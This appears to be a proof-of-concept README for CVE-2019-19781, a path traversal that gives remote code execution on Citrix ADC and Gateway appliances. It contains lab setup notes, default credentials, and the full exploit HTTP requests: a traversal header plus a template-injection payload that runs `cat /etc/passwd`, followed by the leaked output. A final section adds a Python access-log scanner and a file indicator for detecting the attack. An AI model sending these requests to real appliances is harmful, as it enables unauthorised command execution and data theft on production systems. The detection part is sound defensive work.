PoC details: c76697937c8b228ffee62a215f62976c26150f86

Related vulnerability
Title: Citrix Application Delivery Controller and Citrix Systems Gateway path traversal vulnerability (CVE-2019-19781)
Description: Citrix Systems NetScaler Gateway (Citrix Systems Gateway) and Citrix Application Delivery Controller (ADC) are both products of Citrix Systems, a US company. Citrix Systems NetScaler Gateway is a secure remote-access solution that gives administrators application-level and data-level control so that users can remotely access applications and data from any location. Citrix Application Delivery Controll
Description
Citrix ADC Remote Code Execution
Introduction
# CVE-2019-19781 Citrix ADC Remote Code Execution

![](./CVE-2019-19781.gif)


## python usage:

`python CVE-2019-19781.py http://192.168.3.244`

[![asciicast](https://asciinema.org/a/czEvEqxWWA0nVaCs6BofkEAiW.svg)](https://asciinema.org/a/czEvEqxWWA0nVaCs6BofkEAiW)




## 0x01 download NSVPX-ESX-13.0-47.22_nc_64.zip

#### https://www.citrix.com/downloads/citrix-gateway/

![](ovf.png)

#### configure static network
![](./static.png)



![](./vmware.png)

## 0x02 nmap scan
```
Scanning 192.168.3.244 [65535 ports]
Discovered open port 80/tcp on 192.168.3.244
Discovered open port 22/tcp on 192.168.3.244
Discovered open port 443/tcp on 192.168.3.244
```
![](./citrix.png)

I have not installed an SSL certificate

`http://192.168.3.244/`

default password: nsroot/nsroot
![](./nsroot.png)

## 0x03 upload xml
![](./upload_xml.png)

```
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Host: 192.168.3.244
User-Agent: 1
Connection: close
NSC_USER: ../../../netscaler/portal/templates/jas502n
NSC_NONCE: nsroot
Content-Length: 97

url=http://example.com&title=jas502n&desc=[% template.new('BLOCK' = 'print `cat /etc/passwd`') %]
```

```
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 06:36:44 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 11 Jan 2020 06:36:44 GMT
ETag: W/"87-59bdd52283e00"
Accept-Ranges: bytes
Content-Length: 135
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<HTML>
<BODY>
<SCRIPT language=javascript type=text/javascript>
//parent.window.ns_reload();
window.close();
</SCRIPT>
</BODY>
</HTML>
```

## 0x04 execute command
![](./execute_command.png)


```
GET /vpn/../vpns/portal/jas502n.xml HTTP/1.1
Host: 192.168.3.244
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
NSC_USER: nsroot
NSC_NONCE: nsroot
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0


```

```
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 06:37:40 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Cache-control: no-cache
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Expires: Sat, 11 Jan 2020 06:37:40 GMT
Content-Length: 2255

# $FreeBSD: release/8.4.0/etc/master.passwd 243948 2012-12-06 11:54:25Z rwatson $
#
root:*:0:0:Charlie &:/root:/usr/bin/bash
nsroot:*:0:0:Netscaler Root:/root:/netscaler/nssh
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/sbin/nologin
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
nsmonitor:*:65532:65534:Netscaler Monitoring user:/var/nstmp/monitors:/usr/sbin/nologin
&#117;&#110;&#100;&#101;&#102;&#32;&#101;&#114;&#114;&#111;&#114;&#32;&#45;&#32;&#65;&#116;&#116;&#101;&#109;&#112;&#116;&#32;&#116;&#111;&#32;&#98;&#108;&#101;&#115;&#115;&#32;&#105;&#110;&#116;&#111;&#32;&#97;&#32;&#114;&#101;&#102;&#101;&#114;&#101;&#110;&#99;&#101;&#32;&#97;&#116;&#32;&#47;&#117;&#115;&#114;&#47;&#108;&#111;&#99;&#97;&#108;&#47;&#108;&#105;&#98;&#47;&#112;&#101;&#114;&#108;&#53;&#47;&#115;&#105;&#116;&#101;&#95;&#112;&#101;&#114;&#108;&#47;&#53;&#46;&#49;&#52;&#46;&#50;&#47;&#109;&#97;&#99;&#104;&#47;&#84;&#101;&#109;&#112;&#108;&#97;&#116;&#101;&#47;&#68;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#112;&#109;&#32;&#108;&#105;&#110;&#101;&#32;&#57;&#50;&#46;&#10;
```

`undef error - Attempt to bless into a reference at /usr/local/lib/perl5/site_perl/5.14.2/mach/Template/Document.pm line 92.`
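The two requests above leave a recognisable trace in the Apache access log of the appliance: a `/../` hop from `/vpn/` into `/vpns/`, first against `newbm.pl` and then against the rendered template. The following is an added example, not code from this PoC repository: a small Python scanner that flags that pattern over a few constructed log lines, and generalises slightly beyond the write-up by also collapsing URL-encoded and double-encoded `..` variants before matching.

```python
import re
from urllib.parse import unquote

# Apache-style access log line: client ident user [timestamp] "METHOD path PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# The script the write-up reaches by traversing from /vpn/ into /vpns/.
BOOKMARK_SCRIPT = "/vpns/portal/scripts/newbm.pl"


def normalize(path):
    """Drop the query string and URL-decode twice so %2e%2e / %252e%252e collapse to '..'."""
    return unquote(unquote(path.split("?", 1)[0])).lower()


def classify(path):
    """Return a reason string if the path matches the CVE-2019-19781 pattern, else None."""
    p = normalize(path)
    has_dotdot = "/../" in p or p.endswith("/..")
    if "/vpns/" in p and has_dotdot:
        return "traversal into /vpns/"
    if p.endswith(BOOKMARK_SCRIPT):
        return "bookmark script reached without traversal"
    return None


def scan_log(lines):
    """Return a list of (ip, method, path, status, reason) for every flagged request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line; skip rather than guess
        reason = classify(m.group("path"))
        if reason:
            hits.append((m.group("ip"), m.group("method"),
                         m.group("path"), m.group("status"), reason))
    return hits


# Constructed sample lines modelled on the two requests in the write-up
# (client addresses, sizes and the encoded variant are made up for the example).
SAMPLE_LOG = [
    '192.168.3.10 - - [11/Jan/2020:06:36:44 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 135 "-" "1"',
    '192.168.3.10 - - [11/Jan/2020:06:37:40 +0000] "GET /vpn/../vpns/portal/jas502n.xml HTTP/1.1" 200 2255 "-" "Mozilla/5.0"',
    '192.168.3.11 - - [11/Jan/2020:06:40:02 +0000] "GET /vpn/%2e%2e/vpns/portal/scripts/newbm.pl HTTP/1.1" 404 196 "-" "curl/7.64.1"',
    '192.168.3.12 - - [11/Jan/2020:06:41:10 +0000] "GET /vpn/index.html HTTP/1.1" 200 3120 "-" "Mozilla/5.0"',
    '192.168.3.13 - - [11/Jan/2020:06:42:33 +0000] "GET /logon/LogonPoint/index.html HTTP/1.1" 200 5012 "-" "Mozilla/5.0"',
]
```

On the appliance itself, the matching host-side indicator is an unexpected `.xml` file under `/netscaler/portal/templates/`, which is where the `NSC_USER` traversal in the upload request above writes the template.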

## References

https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/